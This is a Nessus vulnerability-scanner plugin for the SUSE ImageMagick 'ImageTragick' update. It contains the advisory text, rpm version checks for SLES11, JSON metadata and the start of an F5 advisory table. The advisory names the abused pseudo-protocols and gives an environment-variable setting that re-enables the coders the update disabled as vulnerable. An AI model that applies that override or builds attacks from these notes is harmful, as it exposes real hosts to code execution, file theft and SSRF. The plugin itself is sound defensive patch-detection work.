ID SUSE_SU-2016-1275-1.NASL Type nessus Reporter This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2016-05-13T00:00:00
Description
This update for ImageMagick fixes the following issues :
Security issues fixed :
Several coders were vulnerable to remote code execution
attacks; these coders have now been disabled. They can
be re-enabled by exporting the following environment
variable:
MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/modules-Q16/coders/vulnerable/
(bsc#978061)
CVE-2016-3715: Possible file deletion by using
ImageMagick's 'ephemeral' pseudo protocol which deletes
files after reading.
CVE-2016-3716: Possible file moving by using
ImageMagick's 'msl' pseudo protocol with any extension
in any folder.
CVE-2016-3717: Possible local file read by using
ImageMagick's 'label' pseudo protocol to get content of
the files from the server.
CVE-2016-3718: Possible Server Side Request Forgery
(SSRF) to make HTTP GET or FTP request.
Bugs fixed :
Use external svg loader (rsvg)
Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2016:1275-1.
# The text itself is copyright (C) SUSE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
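# Registration phase: when the scanner loads the plugin with `description` set,
# the script only declares its metadata (id, CVEs, advisory text, risk data,
# dependency and required KB keys) and exits before any host check runs.
if (description)
{
  script_id(91119);
  script_version("2.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  # The five CVEs of the advisory. CVE-2016-3714 is the shell-character
  # filtering issue that the description text ties to code execution.
  script_cve_id("CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718");

  script_name(english:"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SUSE host is missing one or more security updates."
  );

  # Advisory text shown in the report. The MAGICK_CODER_MODULE_PATH value is
  # kept on a single line: the advisory's line wrap had split the path
  # ("mo" / "dules", "vu lnerable"), which defeats exact matching when
  # auditing process environments or service definitions for this override.
  # Exporting the variable re-enables the coders the update disabled, and this
  # plugin only compares rpm versions, so it does not notice such an override.
  script_set_attribute(
    attribute:"description",
    value:
"This update for ImageMagick fixes the following issues :
Security issues fixed :
- Several coders were vulnerable to remote code execution
attacks, these coders have now been disabled. They can
be re-enabled by exporting the following environment
variable
MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/modules-Q16/coders/vulnerable/
(bsc#978061)
- CVE-2016-3714: Insufficient shell characters filtering
leads to (potentially remote) code execution
- CVE-2016-3715: Possible file deletion by using
ImageMagick's 'ephemeral' pseudo protocol which deletes
files after reading.
- CVE-2016-3716: Possible file moving by using
ImageMagick's 'msl' pseudo protocol with any extension
in any folder.
- CVE-2016-3717: Possible local file read by using
ImageMagick's 'label' pseudo protocol to get content of
the files from the server.
- CVE-2016-3718: Possible Server Side Request Forgery
(SSRF) to make HTTP GET or FTP request.
Bugs fixed :
- Use external svg loader (rsvg)
Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );

  # Reference links: the SUSE bug, one SUSE CVE page per CVE, and the advisory.
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=978061"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-3714/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-3715/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-3716/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-3717/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-3718/"
  );
  # https://www.suse.com/support/update/announcement/2016/suse-su-20161275-1/
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?7e254931"
  );

  # Remediation text: one zypper patch command per affected SUSE product.
  script_set_attribute(
    attribute:"solution",
    value:
"To install this SUSE Security Update use YaST online_update.
Alternatively you can run the command listed for your product :
SUSE OpenStack Cloud 5 :
zypper in -t patch sleclo50sp3-ImageMagick-12549=1
SUSE Manager Proxy 2.1 :
zypper in -t patch slemap21-ImageMagick-12549=1
SUSE Manager 2.1 :
zypper in -t patch sleman21-ImageMagick-12549=1
SUSE Linux Enterprise Software Development Kit 11-SP4 :
zypper in -t patch sdksp4-ImageMagick-12549=1
SUSE Linux Enterprise Server 11-SP4 :
zypper in -t patch slessp4-ImageMagick-12549=1
SUSE Linux Enterprise Server 11-SP3-LTSS :
zypper in -t patch slessp3-ImageMagick-12549=1
SUSE Linux Enterprise Server 11-SP2-LTSS :
zypper in -t patch slessp2-ImageMagick-12549=1
SUSE Linux Enterprise Debuginfo 11-SP4 :
zypper in -t patch dbgsp4-ImageMagick-12549=1
SUSE Linux Enterprise Debuginfo 11-SP3 :
zypper in -t patch dbgsp3-ImageMagick-12549=1
SUSE Linux Enterprise Debuginfo 11-SP2 :
zypper in -t patch dbgsp2-ImageMagick-12549=1
To bring your system up-to-date, use 'zypper patch'."
  );

  # Risk data. The v2 base vector rates the attack vector as Network (AV:N)
  # while the v3 base vector rates it as Local (AV:L), so the two scores are
  # not interchangeable when ranking this finding.
  # NOTE(review): for hosts that feed untrusted images to ImageMagick, the
  # network-reachable reading is presumably the relevant one - confirm per host.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");

  # Exploitation status as recorded by the plugin: exploits exist and the
  # issue is flagged as used by malware.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  # A local check: the only package CPE declared is libMagickCore1 on SUSE 11.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libMagickCore1");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/05/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/05/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/13");
  script_set_attribute(attribute:"in_the_news", value:"true");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  # KB keys the check phase reads. Host/SuSE/patchlevel is also read there but
  # is not listed as required; the check phase defaults it to "0" when absent.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  # Registration ends here; nothing below runs while `description` is set.
  exit(0);
}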
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Check phase, part 1: decide whether this host is in scope before any package
# is compared. Each guard hands a reason code to audit() (from audit.inc, not
# shown here). A host that fails a guard is audited out of scope; that is not
# a statement that the host is patched.

# Local (credentialed) checks must have been enabled for this host.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# The release string must be present and start with SLED or SLES.
release = get_kb_item("Host/SuSE/release");
if (isnull(release))
{
  audit(AUDIT_OS_NOT, "SUSE");
}
else if (release !~ "^(SLED|SLES)")
{
  audit(AUDIT_OS_NOT, "SUSE");
}

# Reduce the release string to product plus major version (e.g. "SLES11").
os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(os_ver))
{
  audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
}
os_ver = os_ver[1];

# This advisory is checked for SLES11 only; any other SLE product stops here.
if (! preg(pattern:"^(SLES11)$", string:os_ver))
{
  audit(AUDIT_OS_NOT, "SUSE SLES11", "SUSE " + os_ver);
}

# Without the collected rpm list there is nothing to compare against.
if (!get_kb_item("Host/SuSE/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Architectures handled: i386 through i686, x86_64 and s390x.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if (!(cpu =~ "^i[3-6]86$" || "x86_64" >< cpu || "s390x" >< cpu))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);
}

# A missing patch level is treated as "0"; only SP2, SP3 and SP4 are in scope.
sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp))
{
  sp = "0";
}
if (os_ver == "SLES11")
{
  if (! preg(pattern:"^(2|3|4)$", string:sp))
  {
    audit(AUDIT_OS_NOT, "SLES11 SP2/3/4", os_ver + " SP" + sp);
  }
}
# Check phase, part 2: compare installed packages with the fixed build
# 6.4.3.6-7.34.1 for each in-scope service pack, newest first. Per service
# pack the 32-bit compat package is checked on x86_64 and s390x, then the
# base libMagickCore1 package with no architecture restriction.
# rpm_check() comes from rpm.inc (not shown); presumably it returns true when
# the installed package is older than the reference - confirm there.
#
# This is a package-version test only. The advisory text carried by this
# plugin states that the disabled coders can be re-enabled through the
# MAGICK_CODER_MODULE_PATH environment variable; nothing here inspects that,
# so a host that passes these checks still needs a separate review for it.
flag = 0;
foreach sp_level (make_list("4", "3", "2"))
{
  if (rpm_check(release:"SLES11", sp:sp_level, cpu:"x86_64", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
  if (rpm_check(release:"SLES11", sp:sp_level, cpu:"s390x", reference:"libMagickCore1-32bit-6.4.3.6-7.34.1")) flag++;
  if (rpm_check(release:"SLES11", sp:sp_level, reference:"libMagickCore1-6.4.3.6-7.34.1")) flag++;
}
# Check phase, part 3: turn the package comparison into a result.
if (!flag)
{
  # No package was flagged. The audit reason depends on whether any package
  # test was recorded at all: some tested (not affected) versus none tested
  # (ImageMagick not installed). pkg_tests_get() is not defined in this file.
  tested = pkg_tests_get();
  if (!tested) audit(AUDIT_PACKAGE_NOT_INSTALLED, "ImageMagick");
  else audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
}
else
{
  # At least one package was flagged: raise the finding on port 0, attaching
  # the rpm report only when report verbosity is above 0.
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
{"id": "SUSE_SU-2016-1275-1.NASL", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled. They can\n be re-enabled by exporting the following environment\n variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo\n dules-Q16/coders/vu lnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2016-05-13T00:00:00", "modified": "2016-05-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/91119", "reporter": "This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2016-3715/", "https://bugzilla.suse.com/show_bug.cgi?id=978061", "https://www.suse.com/security/cve/CVE-2016-3717/", "http://www.nessus.org/u?7e254931", "https://www.suse.com/security/cve/CVE-2016-3714/", "https://www.suse.com/security/cve/CVE-2016-3716/", "https://www.suse.com/security/cve/CVE-2016-3718/"], "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "type": "nessus", "lastseen": "2021-01-20T14:45:36", "edition": 27, "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K61974123", "F5:K03151140", "SOL29154575", "F5:K25102203", "SOL25102203", "F5:K10550253", "SOL10550253", "SOL03151140", "SOL61974123", "F5:K29154575"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310882484", "OPENVAS:1361412562310807568", "OPENVAS:1361412562310882483", "OPENVAS:1361412562311220161021", "OPENVAS:1361412562310851305", "OPENVAS:703580", "OPENVAS:1361412562310703580", "OPENVAS:1361412562310851307", "OPENVAS:1361412562310851304", "OPENVAS:1361412562310871609"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1261-1", "SUSE-SU-2016:1260-1", "SUSE-SU-2016:1301-1", "OPENSUSE-SU-2016:1266-1", "OPENSUSE-SU-2016:1326-1", "SUSE-SU-2016:1275-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-484-1:5CC12", "DEBIAN:DLA-1401-1:A41C0", "DEBIAN:DLA-486-1:42FF7", "DEBIAN:DSA-3580-1:70B04", "DEBIAN:DSA-3746-1:A9B4D"]}, {"type": "freebsd", "idList": ["0D724B05-687F-4527-9C03-AF34D3B094EC"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-1237", "ELSA-2016-0726"]}, {"type": "seebug", "idList": ["SSV:91446", "SSV:91463"]}, {"type": "exploitdb", "idList": ["EDB-ID:39791", "EDB-ID:39767"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E547A33BCC88CE840B8FDF179CDA0103"]}, {"type": "centos", "idList": ["CESA-2016:0726"]}, {"type": "redhat", "idList": ["RHSA-2016:0726"]}, {"type": "amazon", "idList": ["ALAS-2016-699"]}, {"type": 
"zdt", "idList": ["1337DAY-ID-25991"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2016-132-01.NASL", "SUSE_SU-2016-1260-1.NASL", "ORACLELINUX_ELSA-2016-0726.NASL", "REDHAT-RHSA-2016-0726.NASL", "DEBIAN_DLA-486.NASL", "FREEBSD_PKG_0D724B05687F45279C03AF34D3B094EC.NASL", "CENTOS_RHSA-2016-0726.NASL", "EULEROS_SA-2016-1021.NASL", "OPENSUSE-2016-569.NASL", "IMAGEMAGICK_7_0_1_1.NASL"]}, {"type": "slackware", "idList": ["SSA-2016-132-01"]}, {"type": "ubuntu", "idList": ["USN-2990-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:129B6A9BB5C74D717E5AB861B666605D"]}, {"type": "cve", "idList": ["CVE-2016-3715", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-3716", "CVE-2016-3714"]}, {"type": "gentoo", "idList": ["GLSA-201611-21"]}, {"type": "symantec", "idList": ["SMNTC-1408"]}, {"type": "cert", "idList": ["VU:250519"]}, {"type": "threatpost", "idList": ["THREATPOST:5A0AA7B5B7C5F0F1DCB3F0240A055C3F", "THREATPOST:0FADDF3632693BA6B864F1A3FB8D7EF9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136931"]}, {"type": "archlinux", "idList": ["ASA-201605-6"]}, {"type": "thn", "idList": ["THN:76D72EEDBF0F154F1633FE307178F974"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786777"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/FILEFORMAT/IMAGEMAGICK_DELEGATE"]}, {"type": "hackerone", "idList": ["H1:143966"]}], "modified": "2021-01-20T14:45:36", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2021-01-20T14:45:36", "rev": 2}, "vulnersScore": 8.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1275-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91119);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3714\", 
\"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled. They can\n be re-enabled by exporting the following environment\n variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo\n dules-Q16/coders/vu lnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3714/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3715/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3716/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3717/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3718/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161275-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e254931\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5 :\n\nzypper in -t patch sleclo50sp3-ImageMagick-12549=1\n\nSUSE Manager Proxy 2.1 :\n\nzypper in -t patch slemap21-ImageMagick-12549=1\n\nSUSE Manager 2.1 :\n\nzypper in -t patch sleman21-ImageMagick-12549=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS :\n\nzypper in -t patch slessp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch 
dbgsp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2 :\n\nzypper in -t patch dbgsp2-ImageMagick-12549=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "91119", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:libMagickCore1"], "scheme": null, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}
{"f5": [{"lastseen": "2019-02-20T21:07:35", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "\nF5 Product Development has assigned ID 591908 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H29154575 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.1 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 
13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version 